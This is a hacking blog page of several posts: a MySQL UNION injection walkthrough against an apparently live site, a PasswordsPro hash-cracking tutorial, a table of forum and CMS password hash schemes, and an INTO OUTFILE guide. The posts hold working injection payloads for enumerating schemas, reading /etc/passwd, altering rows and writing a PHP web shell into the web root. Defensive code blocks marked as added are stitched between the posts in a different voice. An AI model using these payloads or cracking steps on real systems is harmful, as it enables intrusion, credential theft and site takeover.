Friday, January 11, 2013

Real World SQL Injection

Exploiting Web 2.0 , Real World SQL INJECTION




0x000 - NULL
0x001 - Introduction
0x010 - Global Exploiting
0x011 - Exploiting The Bug
0x101 - Conclusion
0x110 - Helpful links


------------------------------------------------------

0x001 - Introduction :

SQL Injection is a technique that lets you exploit

a web vulnerability to extract the contents of the database

and display them to the injector, thanks to an error in the way the

request is built ....

------------------------------------------------------

0x010 - Global Exploiting :

Exploiting The SQL Injection Vulnerability

To exploit this vulnerability you need the following

conditions :

1- Null the query

2- Get The Number of columns

-> To null the query it's enough to add something that does not

exist in the database

-> To know the number of columns in MySQL you can

use the following command in the query : '+order+by+x--

x is the number of columns you are trying to guess :

=> if the page shows normally with no errors, this means that

the number you entered is < the real number of columns

=> if the page shows an error, this means that

the number you entered is > the real number of columns

now you are wondering how to know the real number of columns

I'll tell you , it's the number right before the 1st error !

Note : Don't forget the comment :

( -- or /* or # or a null byte )

I hope it's pretty clear

so build the query like this

=> ' union select 1,2,3--

1,2,3 -> number of columns

in our example the number of columns is 19 :

'+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
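The whole column-counting and UNION trick above only works because the page's input is pasted straight into the SQL text. The following is an added example (written for this page, not code from the original post), using Python's built-in sqlite3 as a stand-in for MySQL: the same concatenation bug beside its parameterised fix, fed the same shape of payload the post uses. The `news`/`users` tables and the `muu` row are constructed sample data.

```python
import sqlite3

# Constructed sample database (stand-in for the page's MySQL target): a "news"
# table the search form queries, and a "users" table the injection reaches via UNION.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'hello', 'first post');
        CREATE TABLE users(id INTEGER, name TEXT, pw_hash TEXT);
        INSERT INTO users VALUES (1, 'muu', 'deadbeef');
    """)
    return con

def search_vulnerable(con, title):
    # The pattern the post exploits: untrusted input pasted into the SQL text,
    # so a quote in the input ends the string literal and the rest becomes SQL.
    sql = "SELECT id, title, body FROM news WHERE title = '" + title + "'"
    return con.execute(sql).fetchall()

def search_safe(con, title):
    # Hardened form: a bound parameter. The driver sends the value separately
    # from the statement, so quotes, UNION and "--" are just characters in data.
    sql = "SELECT id, title, body FROM news WHERE title = ?"
    return con.execute(sql, (title,)).fetchall()

# Constructed input in the shape the post describes: "null" the query with a
# title that does not exist, then UNION a SELECT with the same number of columns
# (three here, nineteen on the page) and comment out the trailing quote with "--".
PAYLOAD = "nothere' UNION SELECT id, name, pw_hash FROM users--"

def demo():
    con = make_db()
    return {
        "vulnerable": search_vulnerable(con, PAYLOAD),  # leaks the users row
        "safe": search_safe(con, PAYLOAD),              # no row has that literal title
        "normal": search_safe(con, "hello"),            # legitimate lookup still works
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The point to take from it: the parameterised version returns an empty result for the payload, not an error, because the whole string is compared as a title. There is nothing for the `ORDER BY` probe to count and nothing for `UNION` to append to.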




xx - now let's get basic info about this database

=> DataBase Name

-> you can get the name of the db with 'database()'

' union select 1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17,18,19--




The database is called "fluff2"

=> DataBase Version

-> you can get the version of the db with 'version()'

' union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19--




The database Version is "5"

=> DataBase UserName

-> you can get the username of the db with 'user()'

' union select 1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18,19--




The database username is "muu"

=> DataBase Location

-> you can get the location of the db with '@@datadir'

' union select 1,2,3,4,5,6,7,@@datadir,9,10,11,12,13,14,15,16,17,18,19--




The database is located in "/var/lib/mysql/"

xxx - Get your privileges !

Let's Try any priv's (select,update,file etc...)

' union select 1,2,3,4,5,6,7,update_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user--

' union select 1,2,3,4,5,6,7,file_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user--

' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user--

it seems that nothing is allowed !




well , since our user is muu let's try to see our priv's where user = muu

' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)--

we can see we got full privileges now :P




0x011 - Exploiting The Bug :

let's try now to get the database content and use it !

=> uploading a file !

to upload any file magic_quotes has to be set 'OFF'

-> what the fuck is magic_quotes ?

Magic_Quotes is a feature in PHP made to help coders

and developers avoid falling into SQL injection vulnerabilities

and it's going to be removed in PHP6 !

Well , in our FaceBook Magic_Quotes are set 'ON'

so we cannot use into outfile to upload a file !

=> Getting DB content :

to read the content of a specific column , you must use the following

' union select 1,2,3,4,5,6,7,column,9,10,11,12,13,14,15,16,17,18,19 from table--

column -> its your wanted column to read

table -> its the table where the wanted column located

Now you wonder : you don't know the column names or table names ,

so how do you do it ?

since the database is V5 it has to have information_schema inside

so let's exploit information_schema :

-> Get Tables :

' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--




Like you see, it's showing the name of the table | database

but only one table appears ! what to do to show the rest ?

change concat into group_concat ; the xplt then looks like this :

' union select 1,2,3,4,5,6,7,group_concat(table_name,0x7c,table_schema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--




well it's showing some more

but this is not all

let's try something different !

add LIMIT 1 OFFSET 44-- after our current exploit

' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables LIMIT 1 OFFSET 44--

and Change the '44' to another number and it will show another table

Now you wonder how to get the table columns ?!

Alright , you can get the table columns from information_schema.columns like the following

from+information_schema.columns+where+table_name="table_name"

so in our exploit it will become like this :

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.columns where table_name='info'--

since Magic_Quotes are set to 'ON' we must convert the table name to ASCII

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.columns where table_name=CHAR(105, 110, 102, 111)--




Bingo ! this is one column

to show the others use 'limit 1 offset'

You can see the content of any column =)

For now let's try to look for a specific table or a specific column !

you can get it using

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like time--

Note : time is the column you want to look for

and don't forget to change the column to ASCII because magic_quotes is on

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--

To see other info about the column, concatenate 'column_name' with table_schema and table_name

' union select 1,2,3,4,5,6,7,concat(column_name,0x7c,table_schema,0x7c,table_name),9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--




update fluff2 set time=alphanix where

Bingo ! You can see column , db , table , and look for any column ,

pretty easy , isn't it ?

=> Reading Any File content :

since we have file loading privileges , we can load any file

on the server (must have the right permissions) and show it !

' union select 1,2,3,4,5,6,7,load_file(/etc/passwd),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=muu--

and convert to ASCII

' union select 1,2,3,4,5,6,7,load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)--




here we loaded the '/etc/passwd' file , I would like to

get the shadow but I don't have root privileges

=> Updating the database :

since we got the update privilege we can change the value

of any field in the db !

the update query looks like the following :

' update table_name set column_name='new value' where column_name='value' where user=muu

never forget to convert to ASCII xD
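Every request this section sends leaves a recognisable trace in the web server's access log: an `ORDER BY` probe, `UNION SELECT` padded with numbers, `information_schema` and `mysql.user` lookups, `CHAR(...)` lists standing in for quoted strings, `load_file`, and a trailing comment. The following is an added example from the detection side (written for this page, not code from the original post): a small scanner that URL-decodes the query string of combined-log-format lines and tags the shapes above, then rolls the tags up per client so the staged sequence stands out. The log lines are constructed samples that mirror the post's own payloads, plus two benign requests.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Signatures for the payload shapes this post uses, applied to the URL-decoded
# query string so "+" and %27 no longer hide the SQL.
SQLI_PATTERNS = {
    "order_by_probe": re.compile(r"'\s*order\s+by\s+\d+", re.I),
    "union_select":   re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum":    re.compile(r"\binformation_schema\.\w+", re.I),
    "mysql_user":     re.compile(r"\bmysql\.user\b", re.I),
    "file_access":    re.compile(r"\b(load_file\s*\(|into\s+(out|dump)file\b)", re.I),
    "char_encoding":  re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)+\s*\)", re.I),
    "comment_tail":   re.compile(r"(--|/\*|\x00)\s*$"),
}

# Combined-log-format request line: client, timestamp, method, target, status.
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (client_ip, status, sorted tag list) or None when nothing matched."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    ip, status, target = m.group(1), int(m.group(5)), m.group(4)
    decoded = unquote_plus(target.partition("?")[2])
    tags = sorted(name for name, rx in SQLI_PATTERNS.items() if rx.search(decoded))
    return (ip, status, tags) if tags else None

def scan(lines):
    """Findings per line, plus the union of tags seen per client address."""
    findings, per_ip = [], defaultdict(set)
    for line in lines:
        hit = classify(line)
        if hit:
            findings.append(hit)
            per_ip[hit[0]].update(hit[2])
    return findings, {ip: sorted(tags) for ip, tags in per_ip.items()}

HIGH = {"file_access", "mysql_user", "schema_enum"}  # data or file exfiltration stage

def severity(tags):
    if HIGH & set(tags):
        return "high"
    if "union_select" in tags:
        return "medium"
    return "low"

# Constructed log lines tracing the staged sequence this post walks through
# (ORDER BY probe, UNION, information_schema, load_file) plus two benign requests.
LOG_LINES = [
    '10.0.0.5 - - [11/Jan/2013:10:01:02 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5123',
    '10.0.0.9 - - [11/Jan/2013:10:01:09 +0000] "GET /news.php?id=1%27+order+by+20-- HTTP/1.1" 500 312',
    '10.0.0.9 - - [11/Jan/2013:10:01:15 +0000] "GET /news.php?id=1%27+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- HTTP/1.1" 200 5200',
    '10.0.0.9 - - [11/Jan/2013:10:02:01 +0000] "GET /news.php?id=1%27+union+select+1,2,3,4,5,6,7,group_concat(table_name,0x7c,table_schema),9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.tables-- HTTP/1.1" 200 6100',
    '10.0.0.9 - - [11/Jan/2013:10:03:30 +0000] "GET /news.php?id=1%27+union+select+1,2,3,4,5,6,7,load_file(CHAR(47,101,116,99,47,112,97,115,115,119,100)),9,10,11,12,13,14,15,16,17,18,19+from+mysql.user+where+user=CHAR(109,117,117)-- HTTP/1.1" 200 7300',
    '10.0.0.7 - - [11/Jan/2013:10:04:00 +0000] "GET /search.php?q=union+station+timetable HTTP/1.1" 200 2200',
]

if __name__ == "__main__":
    found, by_client = scan(LOG_LINES)
    for ip, status, tags in found:
        print(ip, status, severity(tags), tags)
    print(by_client)
```

Two design notes. Matching happens after decoding, because the post writes spaces as `+` and the quote as `%27`; matching the raw line would miss both. And the per-client roll-up matters more than any single tag: a lone `--` is noise, but one address that moves from `order_by_probe` to `union_select` to `schema_enum` to `file_access` within minutes is the whole procedure above, and worth an alert on its own.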

------------------------------------------------------

0x101 - Conclusion :

60% of scripts are vulnerable to SQL injection , and it's really important

to learn how to protect ourselves from it to make more secure scripts


0x110 - Additional Useful Link :

http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/

Monday, January 7, 2013

How to use Passwords Pro

My tutorial will show you the 3 easiest functions to make use of a Dictionary attack and a Hybrid attack

Before we begin, You will need the following:

1. PasswordsPro
2. A wordlist (Multiple lists are suggested)
3. A Brain
4. Patience

To begin I will show you a Dictionary Attack

Note: The algorithm depends on your Hash.

1. Open PasswordsPro


2. Click Options
3. Click Hashing Modules, Right Click, Add
4. Browse to your PasswordsPro Folder


5. Open the Modules folder, Press CTRL+A, Deselect the 2 folders.


6. Press ok
7. Click Dictionaries, Right click, Add



8. Select your Dictionaries (Ensure you click All files). For this I'll be using MoPList.dic, Click OK etc etc



9. Note: Time to input your hashes. This can be done in multiple ways, I will only be showing the MANUAL way.
Right click one of the cells, Click Add


10. Insert your hash, I will be using these hashes :

10af61c65f34b24a1c591ca77eff73c0:10blah


Note: Just to show you how I would usually do it


11. Select your type of attack, Simple Dictionary

12. Press Start
13. The program will then work on cracking your hashes.
14. As you can see, The program has found one of my passwords.


15. Enjoy =)
Note: You are never 100% guaranteed to find a password

Hybrid Attack

Simply follow the steps above, but at Step 7 press Hybrid Dictionary Attack


And as you can see, I have found another password =)

Monday, December 31, 2012

List of Password Encryption Algorithms

                  List of algorithms in forums :
-----------------------------------------------------------------------------------
| Title             | Hash Algorithm             | Prefix       | Table            |
-----------------------------------------------------------------------------------
| Beehive           | md5($pass)                 | none         | USER             |
| Intellect Board   | md5($pass)                 | none         | User             |
| IPB 1.x.x         | md5($pass)                 | ibf_         | members          |
| IPB 2.x.x         | md5(md5($salt).md5($pass)) | ibf_         | members_converge |
| ITA Forum         | md5($pass)                 | itaf_        | user             |
| MercuryBoard      | md5($pass)                 | mb_          | users            |
| MiniBB            | md5($pass)                 | minibbtable_ | users            |
| myBB 1.2.x        | md5(md5($salt).md5($pass)) | mybb_        | users            |
| PBLang            | md5($pass)                 | the hash for each user is stored in the file /db/members/<username> |
| phpBB             | md5($pass)                 | phpbb_       | users            |
| phpBB > 3.0.0 RC5 | md5(phpbb3)                | phpbb_       | users            |
| PhpMyForum        | md5($pass)                 | pmf_         | user             |
| PunBB 1.2.x       | SHA-1                      | none         | users            |
| SMF 1.0.x         | md5(HMAC)                  | smf_         | members          |
| SMF 1.1.x         | sha1($username.$pass)      | smf_         | members          |
| Snitz forums 2000 | SHA-256                    | FORUM_       | MEMBERS          |
| QuickSilver Forum | md5($pass)                 | qsf_         | users            |
| UseBB             | md5($pass)                 | usebb_       | members          |
| Vanilla           | md5($pass)                 | LUM_         | User             |
| VBulletin         | md5(md5($pass).$salt)      | none         | user             |
| VikingBoard       | md5($pass)                 | vboard_      | member           |
| W-Agora           | md5($pass)                 | [name]_      | users            |
| WWWThreads        | DES(unix)                  | w3t_         | users            |
| XMB Forum         | md5($pass)                 | none         | members          |
| YaBB              | md5(HMAC)                  | yabbse_      | members          |
-----------------------------------------------------------------------------------


           List of algorithms used in CMS, online shops, etc.
-----------------------------------------------------------------------------------
| Title             | Hash Algorithm             | Prefix       | Table            |
-----------------------------------------------------------------------------------
| AboCMS            | md5($pass)                 | none         | users            |
| Bitrix            | md5($pass)                 | could not be verified           |
| DaneoCMS          | md5($pass)                 | dn[version]_ | users            |
| DataLife Engine   | md5(md5($pass))            | dle_         | users            |
| e107              | md5(md5($pass))            | e107_        | user             |
| Joomla            | md5($pass)                 | jos_         | users            |
| Joomla >=1.0.13   | md5($pass.$salt)           | jos_         | users            |
| Koobi CMS         | md5($pass)                 | koobi_       | user             |
| Koobi CMS >= 6    | md5(md5($pass))            | koobi_       | user             |
| osCommerce        | md5($salt.$pass)           | none         | customers        |
| PHP-Nuke          | md5($pass)                 | nuke_        | authors          |
| RunCMS            | sha1($username.$pass)      | runcms_      | users            |
| Slaed CMS         | md5($pass)                 | slaed_       | users            |
| Wordpress         | md5($pass)                 | wp_          | users            |
| Wordpress >= 2.5  | md5(phpbb3)                | wp_          | users            |
| XOOPS             | md5($pass)                 | xoops_       | users            |
-----------------------------------------------------------------------------------
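Almost every row in these two tables is a single unsalted or lightly salted MD5, which is exactly why the dictionary attack in the post above it works so fast. The following is an added example (written for this page, not from the original post or any of the listed projects) of what an application that still carries such rows can do about it: verify the legacy scheme on login, then transparently re-hash the account with PBKDF2-HMAC-SHA256 so the next dump of the table yields nothing the tables describe. The record layout, the `login` function and the iteration count are assumptions for the example; the legacy formulas are the table's own notation, read as PHP does it (md5() returns a hex string, `.` concatenates).

```python
import hashlib
import hmac
import os

def md5hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()

# Verifiers for the schemes that dominate the tables. Inputs are bytes; PHP's
# md5() returns hex, so the nested forms concatenate hex strings, as the notation says.
LEGACY_SCHEMES = {
    "md5($pass)":                 lambda pw, salt: md5hex(pw),
    "md5($pass.$salt)":           lambda pw, salt: md5hex(pw + salt),
    "md5($salt.$pass)":           lambda pw, salt: md5hex(salt + pw),
    "md5(md5($pass))":            lambda pw, salt: md5hex(md5hex(pw).encode()),
    "md5(md5($salt).md5($pass))": lambda pw, salt: md5hex((md5hex(salt) + md5hex(pw)).encode()),
}

PBKDF2_ITERATIONS = 600_000  # assumption: tune to the latency budget of your login path

def new_hash(password: bytes) -> str:
    """Salted PBKDF2-HMAC-SHA256, self-describing so parameters can be raised later."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password, salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"

def verify_new(stored: str, password: bytes) -> bool:
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password, bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

def login(record: dict, password: bytes):
    """record = {"scheme", "hash", "salt"} (assumed layout). Returns (ok, record_to_store).
    A successful login against a legacy scheme upgrades the row to PBKDF2 in place;
    a failed one leaves the record untouched."""
    if record["scheme"] == "pbkdf2_sha256":
        return verify_new(record["hash"], password), record
    expected = LEGACY_SCHEMES[record["scheme"]](password, record["salt"])
    if not hmac.compare_digest(expected, record["hash"]):
        return False, record
    return True, {"scheme": "pbkdf2_sha256", "hash": new_hash(password), "salt": b""}

if __name__ == "__main__":
    # Constructed legacy row in the plain md5($pass) format most rows above use.
    row = {"scheme": "md5($pass)", "hash": md5hex(b"10blah"), "salt": b""}
    ok, row = login(row, b"10blah")
    print(ok, row["scheme"], row["hash"][:40] + "...")
```

The comparisons use `hmac.compare_digest` rather than `==` so that a wrong guess does not leak how many leading characters matched. Accounts that never log in again keep their old hash, so a migration like this is usually paired with a forced reset for rows still in a legacy scheme after some cut-off.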

Tuesday, December 25, 2012

What is INTO OUTFILE ? (MYSQL SQL Injection Explained)


[+1] The FILE privilege

If we want to read or write files we have to have the FILE privilege.
First see which user we are in the db with this query:

0' UNION SELECT current_user,null /*

you can put current_user or user() or system_user

This will give us the username@server. //(normally ..@localhost)

You can also use the following blind SQL injection queries,
but it's very boring.. :

Guess a name:
1' AND user() LIKE 'root
Brute the name letter by letter:
1' AND MID((user()),1,1)>'m
1' AND MID((user()),2,1)>'m
1' AND MID((user()),3,1)>'m etc...

Now we must access mysql.user so..

0' UNION SELECT 1,2,3,file_priv,4 FROM mysql.user WHERE user = 'username

for username we put the name of current_user.
You can also have a look at the whole mysql.user table without the WHERE clause, but I chose this way because you can easily adapt the injection for blind SQL injection:

1' AND MID((SELECT file_priv FROM mysql.user WHERE user = 'username'),1,1) = 'Y

Naturally, this is a blind injection so you can't write 1,2,3.. because it's not a union select (but it uses subselects).

You can also get the FILE privilege info from the information_schema table on MySQL 5:

0' UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%

The same in blind SQLi:

1' AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'),1,1)='Y


[+2] The web directory problem

Once we know if we can read/write files we have to check out the right path. In the most cases the MySQL server is running on the same machine as the web server does and to access our files later we want to write them onto the web directory. If you define no path, INTO OUTFILE will write into the database directory.

On MySQL 4 we can get an error message displaying the datadir:
0' UNION SELECT load_file('a'),null/*

On MySQL 5 we use:
0' UNION SELECT @@datadir,null/*

The default path for file writing then is datadir\databasename.
You can figure out the database name with:
0' UNION SELECT database(),null/*

Now this information is hard to get with blind SQL injection. But you don't necessarily need it. Just make sure you find out the web directory and use some ../ to jump back from the datadir.

If you are lucky the script uses mysql_result(), mysql_free_result(), mysql_fetch_row() or similar functions and displays warning messages. Then you can easily find out the webserver directory by calling those functions with no valid input, so that they throw a warning message like:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /web/server/path/file.php on line xxx

To provoke an error like this try something like:
0' AND 1='0 or add something like param[]=1

This works on most websites. If you're not lucky you have to guess the web directory or try to use load_file() to fetch files on the server which might help you. Here is a list of possible locations for the Apache configuration file, which may reveal the web directory path:

/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include

Check out the web servers name first by reading the header info and then figure out where it usually stores its configuration files. This also depends on the OS type (*nix/win) so you may want to check that out too. Use @@version or version() to find that out:
0' UNION SELECT @@version,null /*
-nt-log at the end means it’s a windows box, -log only means it’s *nix box.
Or take a look at the paths in error messages or at the header.

Typical web directories to guess could be:

/var/www/root/
/var/www/dbname/path/
/var/www/sitename/htdocs/
/var/www/localhost/htdocs
..


Basically you should be allowed to write into any directory where the MySQL server has write access to, as long as you have the FILE privilege. However, an Administrator can limit the path for public write access.
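Sections [+1] and [+2] together describe the two things an administrator controls here: which accounts hold the global FILE privilege, and whether `secure_file_priv` confines (or disables) `load_file()` and `INTO OUTFILE`. The following is an added example from the defender's side (written for this page, not code from the original post): an audit that parses `SHOW GRANTS` output and the `secure_file_priv` value and reports the combinations that make the file tricks in this post possible. The grant lines are constructed samples in the format MySQL prints (MySQL 5.7 quotes accounts with `'`, MySQL 8 with backticks; both are handled); the `secure_file_priv` semantics are those documented for the variable (NULL disables import/export, an empty value means no restriction, a path confines it), with defaults that vary by version, so check the value on the actual server rather than assuming one.

```python
import re

# Constructed sample: lines in the shape "SHOW GRANTS FOR <account>" prints.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT SELECT, INSERT, UPDATE, DELETE, FILE ON *.* TO 'muu'@'localhost'",
    "GRANT USAGE ON *.* TO `webapp`@`localhost`",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `fluff2`.* TO `webapp`@`localhost`",
]

# GRANT <privs> ON <scope> TO <quoted user>@<quoted host>; quote style captured and reused.
GRANT_RE = re.compile(r"^GRANT (.+?) ON (\S+) TO ([`'])(.+?)\3@([`'])(.+?)\5", re.I)

def parse_grant(line):
    """(account, scope, set of privilege names) or None for lines that are not GRANTs."""
    m = GRANT_RE.match(line)
    if not m:
        return None
    privs = {p.strip().upper() for p in m.group(1).split(",")}
    return f"{m.group(4)}@{m.group(6)}", m.group(2), privs

def accounts_with_file(grants):
    # FILE is a global privilege, so it can only be granted ON *.*,
    # and ALL PRIVILEGES ON *.* includes it.
    found = set()
    for line in grants:
        parsed = parse_grant(line)
        if parsed is None:
            continue
        account, scope, privs = parsed
        if scope == "*.*" and privs & {"FILE", "ALL PRIVILEGES"}:
            found.add(account)
    return sorted(found)

def file_priv_mode(secure_file_priv):
    # Value of the secure_file_priv system variable:
    #   NULL  -> load_file()/INTO OUTFILE disabled server-side (not bypassable from SQL)
    #   ""    -> unrestricted: any path mysqld can reach, the situation this post relies on
    #   path  -> import/export confined to that directory
    if secure_file_priv is None or secure_file_priv.upper() == "NULL":
        return "disabled"
    if secure_file_priv == "":
        return "unrestricted"
    return "restricted"

def audit(grants, secure_file_priv, web_roots=("/var/www", "/srv/www")):
    """Return (mode, list of findings) for one server's grants and secure_file_priv."""
    mode = file_priv_mode(secure_file_priv)
    findings = [f"{acct} holds the global FILE privilege" for acct in accounts_with_file(grants)]
    if mode == "unrestricted" and findings:
        findings.append("secure_file_priv is empty: FILE holders can read/write any path "
                        "mysqld can, including the web root")
    if mode == "restricted" and any(secure_file_priv.startswith(root) for root in web_roots):
        findings.append(f"secure_file_priv={secure_file_priv} lies inside a web root, "
                        "so exported files are web-reachable")
    return mode, findings

if __name__ == "__main__":
    for value in ("", "NULL", "/var/lib/mysql-files/"):
        mode, findings = audit(SAMPLE_GRANTS, value)
        print(repr(value), mode, findings)
```

Note that the application account (`webapp` in the sample) holds neither FILE nor `ALL PRIVILEGES`, which is the configuration that leaves the injection in this post with nothing to read or write even before `secure_file_priv` is considered; the `muu` row reproduces the situation the earlier post on this page found.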

[+3] create useful files

Once you figured out the right directory you can select data and write it into a file with:

0' UNION SELECT columnname,null FROM tablename INTO OUTFILE '../../web/path/file.txt

( sometimes from mysql.user )
Or the whole data without knowing the table/column names:

1' OR 1=1 INTO OUTFILE '../../web/path/file.txt

If you want to avoid separator characters between the data, use INTO DUMPFILE instead of INTO OUTFILE.

You can also combine load_file() with INTO OUTFILE, e.g. putting a copy of a file into the accessible webspace:

0' AND 1=0 UNION SELECT load_file('…') INTO OUTFILE '…

In some cases I'd recommend using

0' AND 1=0 UNION SELECT hex(load_file('…')) INTO OUTFILE '…

and decoding it later with the PHP Charset Encoder, especially when reading the MySQL data files.

Or you can write whatever you want into a file:

0' AND 1=0 UNION SELECT 'code',null INTO OUTFILE '../../web/server/dir/file.php

Here are some useful code examples:

A Normal code for a shell (PHP):



it's very important that PHP safe_mode is turned off!!
If it is turned on maybe we can bypass it simply with a hex converter:

we can convert the code to bypass the MAGIC_QUOTES_GPC filter.
(normally you can see if hex mode works with a load_file(pathinhex),
like load_file(0x2f6574632f706173737764) for /etc/password (<= usually path)


we can see a lot of information about the web server configuration with:



// SQL QUERY

Try to use load_file() to get the database connection credentials, or try to include an existing file on the webserver which handles the mysql connect.

Remember that the quotes are required, so if the error looks like:

error db near '\/www/root/path/page.php'\
maybe it's because quotes are not allowed (a special filter used for anti-xss)

So at the end: try and try and try. Good luck! :)